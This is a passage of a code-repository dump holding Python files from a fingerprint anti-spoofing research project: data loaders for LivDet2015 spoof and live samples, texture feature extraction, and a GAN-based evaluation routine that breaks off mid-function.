sample.shape[0], sample.shape[1]))\n \n return transformation(sample).view((1, sample.shape[0], sample.shape[1])), self.y[idx], self.f[idx], self.f_norm[idx]\n \n def transformations(self):\n data_transform = transforms.Compose([transforms.ToTensor()])\n return data_transform\n \n#%% MAIN\n \nif __name__ == '__main__':\n \n train, val, test = get_data_loaders(\"/ctm-hdd-pool01/DB/LivDet2015/train/\", \"Digital_Persona\", 0, croped=True, unseen_attack=True)\n\n for i, (x, y, f, _) in enumerate(train):\n print(x.shape)\n print(y.shape)\n print(f.shape)\n break" }, { "alpha_fraction": 0.5205720067024231, "alphanum_fraction": 0.544133186340332, "avg_line_length": 35.4529914855957, "blob_id": "f3ac6fedb93cefd13fbea3d92671a23856dada06", "content_id": "6f5fbd91d80195d275292ae4aa5adc4263daa4b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8531, "license_type": "no_license", "max_line_length": 104, "num_lines": 234, "path": "/MLP/data/data_mlp.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport pandas as pd\nimport sys\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float()\n \n#PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n#DATASET=\"CrossMatch\"\nBATCH_SIZE = 64\n\ndef get_data_loaders(path, dataset, test_material, croped=False, unseen_attack=False):\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n elif dataset == 
\"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n elif dataset == \"Hi_Scan\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material)\n \n data = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n data_test = FPAD(path, dataset, material_idx=[test_material], real_idx=real_test, croped=croped)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=1500, size=500)\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=997, size=250)\n elif dataset == \"Hi_Scan\":\n materials_list = [0,1,2,3]\n materials_name = 
[\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=4440, size=1480)\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material]\n \n dataset = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n \n print('\\n--------------------------------------')\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Data loaders\n \n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0} \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\nclass FPAD(Dataset):\n def __init__(self,\n path,\n dataset,\n material_idx,\n real_idx,\n croped = False):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y 
(real=1, fake=0), and f (fake material id) arrays\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = path + self.dataset + \"_\" + self.materials[index] + \".csv\"\n if croped == True:\n self.fake_dir = path + self.dataset + \"_\" + self.materials[index] + \"_c.csv\"\n \n df = pd.read_csv(self.fake_dir)\n \n features_pa = df.to_numpy(copy=True)\n features_pa = features_pa[:, 1:]\n \n n_pa = features_pa.shape[0]\n \n count = count + n_pa\n \n X.extend(features_pa)\n y.extend([1]*n_pa)\n f.extend([index]*n_pa)\n f_norm.extend([index]*n_pa)\n \n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n self.real_dir = path + self.dataset + \"_real.csv\"\n else:\n self.real_dir = path + self.dataset + \"_real_c.csv\"\n \n df = pd.read_csv(self.real_dir)\n \n features_bf = df.to_numpy(copy=True)\n features_bf = features_bf[:, 1:]\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n features_bf = features_bf[self.real_idx] \n\n # append real_data to X, y, and f arrays\n X.extend(features_bf)\n y.extend([0]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, index):\n tranformation = self.tranformations()\n return tranformation(self.X[index]), self.y[index], self.f[index], self.f_norm[index]\n \n def tranformations(self):\n data_transform = transforms.Compose([numpyToTensor()])\n return data_transform\n \n#%%\n \nif __name__ == '__main__':\n \n BATCH_SIZE = 32\n DATASET = \"CrossMatch\"\n\n data = FPAD(DATASET, material_idx=[1, 2], real_idx=np.array(range(1000)), croped=False)\n data_test = FPAD(DATASET, material_idx=[0], real_idx=np.array(range(1000, 1500)), croped=False)\n \n 
train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0}\n \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n" }, { "alpha_fraction": 0.5058882236480713, "alphanum_fraction": 0.5266467332839966, "avg_line_length": 31.430419921875, "blob_id": "b010cbc9d6d405f823fc41331147d1d74d0ee157", "content_id": "5362c39b3454666bc1562242683379380fe540cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10020, "license_type": "no_license", "max_line_length": 151, "num_lines": 309, "path": "/CNNreg+II-GAN/data/data_gen.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport sys\nfrom PIL import Image\nfrom PIL import ImageOps\n\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float() \n\n#%% Get Data Loaders -------------------------------------------------------------------------------------------------\n#\n# Input: \n# - [STR] path (of the images)\n# - [STR] dataset (CrossMatch, Digital_Persona, GreenBit, Hi_Scan, Time_Series)\n# - [INT] test_material (material id to use for testing - 0, 1 or 2 for CrossMatch and Time_Series | 0, 1, 2 or 3 for the remaining datasets)\n# - [INT] img_size (square img)\n# - [INT] batch_size\n# - [BOOL] croped (True to use the previously segmented and cropped 
images)\n# - [BOOL] unseen_attack (True to create a test dataset with an unseen attack using the test material)\n#\n# Output: \n# - train, validation and test data loaders\n\ndef get_data_loaders(path, dataset, test_material, img_size, batch_size, croped=True, unseen_attack=False):\n \n global BATCH_SIZE\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n\n elif dataset == \"Digital_Persona\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n elif dataset == \"GreenBit\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n \n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 16\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n elif dataset == \"Time_Series\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material)\n \n data = FPAD(path, dataset, img_size, material_idx=train_materials, real_idx=real_train)\n data_test = FPAD(path, dataset, img_size, material_idx=[test_material], real_idx=real_test)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n\n materials_list = [0,1,2]\n 
materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=1500, size=500)\n \n elif dataset == \"Digital_Persona\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n \n elif dataset == \"GreenBit\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=997, size=250)\n \n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 16\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n\n elif dataset == \"Time_Series\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=4440, size=1480)\n\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material]\n \n dataset = FPAD(path, dataset, img_size, material_idx=train_materials, real_idx=real_train)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n \n print('\\n--------------------------------------')\n print('Dataset: ' + dataset)\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Data loaders\n \n params = {'batch_size': batch_size,\n 'shuffle': True,\n 'num_workers': 0} \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, 
**params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\n\n \nIMG_HEIGHT = -1 \nIMG_WIDTH = -1 \n\n\nclass FPAD(Dataset):\n def __init__(self,\n PATH,\n dataset,\n img_size,\n material_idx,\n real_idx,\n croped = True):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n self.croped = croped\n self.img_size = img_size\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0)\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n index_norm = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = PATH + dataset + \"/Fake/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path = PATH + dataset + \"/\" + self.materials[index] + \".txt\"\n else:\n self.fake_dir = PATH + dataset + \"/Fake_c/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path= PATH + dataset + \"/\" + self.materials[index] + \"_c.txt\"\n \n with open(txt_path, 'r') as file:\n fake_names = file.readlines()\n \n count = count + len(fake_names)\n \n X.extend(fake_names)\n y.extend([float(1)]*len(fake_names))\n f.extend([index]*len(fake_names))\n f_norm.extend([index_norm]*len(fake_names))\n\n index_norm = index_norm + 1\n\n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n path = PATH + dataset + \"/real.txt\"\n else:\n path = PATH + dataset + \"/real_c.txt\"\n \n # read real names\n with open(path, 'r') as file:\n real_names = file.readlines()\n \n real_names = np.array(real_names)\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n real_names = 
real_names[self.real_idx] \n\n X.extend(real_names)\n y.extend([float(0)]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, idx):\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = self.X[idx] \n sample = Image.open(img_name.rstrip())\n width, height = sample.size \n\n dim = self.img_size\n\n if width > height:\n ratio = dim/width\n else:\n ratio = dim/height\n\n new_width = round(width*ratio)\n new_height = round(height*ratio)\n\n sample = sample.resize((new_width, new_height))\n width, height = sample.size\n \n delta_w = dim - width\n delta_h = dim - height\n padding = (delta_w//2, delta_h//2, delta_w-(delta_w//2), delta_h-(delta_h//2))\n sample = ImageOps.expand(sample, padding, 255)\n \n #sample = 255 - np.array(sample)\n sample = np.array(sample)\n \n if self.dataset == \"Digital_Persona\":\n \n sample = sample[:,:,0]\n sample = np.transpose(sample)\n \n sample.reshape((1, sample.shape[0], sample.shape[1]))\n\n transformation = self.transformations()\n \n return transformation(sample).view((1, sample.shape[0], sample.shape[1])), self.y[idx], self.f[idx], self.f_norm[idx]\n \n def transformations(self):\n data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(mean=(0.5,), std=(0.5,))])\n return data_transform" }, { "alpha_fraction": 0.5834094285964966, "alphanum_fraction": 0.5997130274772644, "avg_line_length": 34.3317985534668, "blob_id": "54afa0ac77230beb19dec1ed01186cd3ed1e347c", "content_id": "a3bbd7c7d9b4bf345156985c355157a59c89a342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7667, "license_type": "no_license", "max_line_length": 166, "num_lines": 217, "path": "/MLP/MLP_feature_extraction.py", "repo_name": 
"joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import division\n\nfrom PIL import Image\nimport glob\nfrom skimage import color\nfrom skimage.feature import local_binary_pattern\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score \nfrom sklearn.metrics import roc_curve \nfrom sklearn.metrics import roc_auc_score\nimport math\nimport sys\n\nfrom scipy.signal import convolve2d\n\ndef normalize(x, minimum=-1, maximum=-1):\n min_max = []\n if minimum == -1 or maximum == -1:\n from sklearn.preprocessing import normalize\n norm_x = normalize(x[:,np.newaxis], axis=0).ravel()\n min_max.append(min(norm_x))\n min_max.append(max(norm_x))\n return np.array(min_max), norm_x\n else:\n norm_x=[]\n for i in range(len(x)):\n norm_x.append((x[i]-min(x))/(max(x)-min(x)) * (maximum-minimum) + minimum)\n return np.array(norm_x)\n\ndef lpq(img, winSize=3, freqestim=1, mode='nh'):\n rho=0.90\n\n STFTalpha=1/winSize # alpha in STFT approaches (for Gaussian derivative alpha=1)\n sigmaS=(winSize-1)/4 # Sigma for STFT Gaussian window (applied if freqestim==2)\n sigmaA=8/(winSize-1) # Sigma for Gaussian derivative quadrature filters (applied if freqestim==3)\n\n convmode='valid' # Compute descriptor responses only on part that have full neigborhood. Use 'same' if all pixels are included (extrapolates np.image with zeros).\n\n img=np.float64(img) # Convert np.image to double\n r=(winSize-1)/2 # Get radius from window size\n x=np.arange(-r,r+1)[np.newaxis] # Form spatial coordinates in window\n\n if freqestim==1: # STFT uniform window\n # Basic STFT filters\n w0=np.ones_like(x)\n w1=np.exp(-2*np.pi*x*STFTalpha*1j)\n w2=np.conj(w1)\n\n ## Run filters to compute the frequency response in the four points. 
Store np.real and np.imaginary parts separately\n # Run first filter\n filterResp1=convolve2d(convolve2d(img,w0.T,convmode),w1,convmode)\n filterResp2=convolve2d(convolve2d(img,w1.T,convmode),w0,convmode)\n filterResp3=convolve2d(convolve2d(img,w1.T,convmode),w1,convmode)\n filterResp4=convolve2d(convolve2d(img,w1.T,convmode),w2,convmode)\n\n # Initilize frequency domain matrix for four frequency coordinates (np.real and np.imaginary parts for each frequency).\n freqResp=np.dstack([filterResp1.real, filterResp1.imag,\n filterResp2.real, filterResp2.imag,\n filterResp3.real, filterResp3.imag,\n filterResp4.real, filterResp4.imag])\n\n ## Perform quantization and compute LPQ codewords\n inds = np.arange(freqResp.shape[2])[np.newaxis,np.newaxis,:]\n LPQdesc=((freqResp>0)*(2**inds)).sum(2)\n\n ## Switch format to uint8 if LPQ code np.image is required as output\n if mode=='im':\n LPQdesc=np.uint8(LPQdesc)\n\n ## Histogram if needed\n if mode=='nh' or mode=='h':\n LPQdesc=np.histogram(LPQdesc.flatten(),range(256))[0]\n\n ## Normalize histogram if needed\n if mode=='nh':\n LPQdesc=LPQdesc/LPQdesc.sum()\n\n return LPQdesc\n\n\ndef featureExtractor(DATASET, croped=False):\n\n PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n \n radius = 1\n n_points = 8 * radius\n METHOD = 'uniform' \n \n if DATASET=='CrossMatch':\n files = '/*.bmp'\n num_img = 500\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n elif DATASET=='Digital_Persona':\n files = '/*.png'\n num_img = 250\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='GreenBit':\n files = '/*.png'\n num_img = 250\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='Hi_Scan':\n files = '/*.bmp'\n num_img = 250\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='Time_Series': #Time_Series\n files = '/*.bmp'\n num_img = 1500\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n if croped 
== False:\n print(\"\\nExtracting features on {}...\".format(DATASET))\n live_path = '/Live'\n fake_path = '/Fake/'\n seg = 'Without_segmentation/'\n #txt = DATASET + '_withoutSegmentation_Int.txt'\n #txt = DATASET + '_withoutSegmentation_LBP.txt'\n txt = DATASET + '_withoutSegmentation_IntLBP.txt'\n csv = \"\"\n else:\n files = '/*.png'\n print(\"\\nExtracting features of ROI on {}...\".format(DATASET))\n live_path = '/Live_c'\n fake_path = '/Fake_c/'\n seg = 'Segmentation/'\n #txt = DATASET + '_withSegmentation_Int.txt'\n #txt = DATASET + '_withSegmentation_LBP.txt'\n txt = DATASET + '_withSegmentation_IntLBP.txt'\n csv = \"_c\"\n \n \n num_clf = 3 \n num_materials = (len(materials))\n \n F = []\n \n intensity_feature = []\n LBP_feature = []\n LPQ_feature = []\n \n print(\"\\n - Bonafide samples\")\n for filename in glob.glob(PATH + DATASET + live_path + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_feature.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_feature.append(hist2.tolist())\n LPQ_feature.append(lpq(img))\n \n \n intensity_feature = np.array(intensity_feature)\n LBP_feature = np.array(LBP_feature)\n LPQ_feature = np.array(LPQ_feature)\n \n BF = np.hstack((intensity_feature, LBP_feature, LPQ_feature))\n \n for i in range(BF.shape[1]):\n min_max, BF[:,i] = normalize(BF[:,i])\n \n F.append(BF)\n \n \n print(\"\\n - Presentation attack samples\")\n for material in materials:\n print(\"\\n - \" + material)\n intensity_feature = []\n LBP_feature = []\n LPQ_feature = []\n for filename in glob.glob(PATH + DATASET + fake_path + material + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = 
np.histogram(img, density=True)\n intensity_feature.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_feature.append(hist2.tolist())\n LPQ_feature.append(lpq(img))\n \n intensity_feature = np.array(intensity_feature)\n LBP_feature = np.array(LBP_feature)\n LPQ_feature = np.array(LPQ_feature) \n \n PAI = np.hstack((intensity_feature, LBP_feature, LPQ_feature)) \n \n for i in range(PAI.shape[1]):\n PAI[:,i] = normalize(PAI[:,i], min_max[0], min_max[1])\n \n F.append(PAI)\n \n import pandas as pd \n pd.DataFrame(F[0]).to_csv(DATASET + '_real' + csv + '.csv')\n\n for i in range(1, len(F)):\n pd.DataFrame(F[i]).to_csv(DATASET + '_' + materials[i-1] + csv + '.csv')\n\n\n'''\ndatasets = ['CrossMatch', 'Digital_Persona', 'GreenBit', 'Hi_Scan', 'Time_Series']\n\nfor dataset in datasets:\n featureExtractor(dataset, croped=False)\n\n''' \ndatasets = ['Digital_Persona', 'GreenBit']\n\nfor dataset in datasets:\n featureExtractor(dataset, croped=True)\n" }, { "alpha_fraction": 0.49096301198005676, "alphanum_fraction": 0.5093194246292114, "avg_line_length": 26.445735931396484, "blob_id": "9ab1d05936d15f68b54132ef09109ecfe14900d2", "content_id": "48e8c2afe64f6b26aee7b6af82c7457bc447100c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7082, "license_type": "no_license", "max_line_length": 116, "num_lines": 258, "path": "/II-GAN/utils/evaluation.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as 
transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\nimport cv2\n\n\n#sys.path.insert(0, 'utils/')\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../models/')\n\nfrom utils import _nanargmin, normal_weights_init\nfrom data import get_data_loaders\nfrom gan import DISCRIMINATOR, GENERATOR\nfrom matcher import MATCHER\n\nloss = nn.BCEWithLogitsLoss()\nsigmoid = nn.Sigmoid()\n\n\ndef eval_model(models, data_loader, device, epoch, num_epochs, matcher_epochs, debug=False, with_generator=True):\n\n matcher_epochs = matcher_epochs + 1\n\n netD, netG = models\n\n with torch.no_grad():\n\n netD.eval()\n netG.eval()\n \n loss_c = 0\n loss_g = 0\n N = 0\n N_fake = 0\n n_correct = 0 \n\n m_score = 0 \n \n for i, (x,y) in enumerate(data_loader, 0):\n \n # (1) Update D network\n \n ## Train with all-real batch\n \n netD.zero_grad()\n netG.zero_grad()\n \n x = x.to(device)\n x_real = x[y == 0]\n x_fake = x[y == 1]\n\n if x_fake.shape[0] < 5:\n continue\n\n\n \n #b_size = real.size(0)\n \n output_real = netD(x_real)\n D_real = torch.round(sigmoid(torch.mean(output_real, dim=(1,2,3))))\n \n real_label = torch.zeros_like(output_real, device=device)\n \n errD_real = loss(output_real, real_label)\n\n ## Train with all-fake batch\n\n if with_generator:\n \n index = [i for i in range(x_fake.shape[0])]\n\n index_to_modify = random.sample(range(x_fake.shape[0]), x_fake.shape[0]//2)\n\n index_to_maintain = [i for i in index if i not in index_to_modify]\n\n x_fake_to_modify = x_fake[index_to_modify,...].clone().detach()\n\n x_fake_to_maintain = x_fake[index_to_maintain,...].clone().detach()\n\n x_fake_to_modify = x_fake_to_modify.to(device)\n\n x_fake_modified = netG(x_fake_to_modify)\n\n x_fake = torch.cat([x_fake_to_maintain, x_fake_modified], dim=0)\n\n if epoch >= num_epochs - matcher_epochs:\n\n try:\n m_score = 
MATCHER(x_fake_to_modify, x_fake_modified)\n except:\n m_score = 10.0\n\n output_fake = netD(x_fake.detach())\n\n D_fake = torch.round(sigmoid(torch.mean(output_fake, dim=(1,2,3))))\n \n fake_label = torch.ones_like(output_fake, device=device)\n \n errD_fake = loss(output_fake, fake_label)\n\n errD = errD_real + errD_fake\n\n loss_c += errD * x.shape[0]\n\n output_fake = netD(x_fake)\n real_label = torch.zeros_like(output_fake, device=device)\n\n errG = loss(output_fake, real_label)\n \n if epoch >= num_epochs - matcher_epochs:\n errG = errG + m_score\n\n loss_g += errG * x_fake.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n N_fake += x_fake.shape[0]\n\n real_label = torch.zeros_like(D_real, device=device)\n fake_label = torch.ones_like(D_fake, device=device)\n\n n_correct += torch.sum(1.*(D_real == real_label)).item()\n n_correct += torch.sum(1.*(D_fake == fake_label)).item()\n\n loss_c = loss_c / N\n loss_g = loss_g / N_fake\n acc = n_correct / N\n\n return loss_c, loss_g, acc\n\n\nfrom sklearn import metrics\nimport math\n\nloss_fn = nn.BCEWithLogitsLoss()\nsigmoid = nn.Sigmoid()\n\ndef test_model(model, data_loader, device, debug=False):\n\n print(\"\\n\")\n\n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n for i, (x, y) in enumerate(data_loader):\n\n sys.stdout.write(\"\\r\" + 'Testing classifier... 
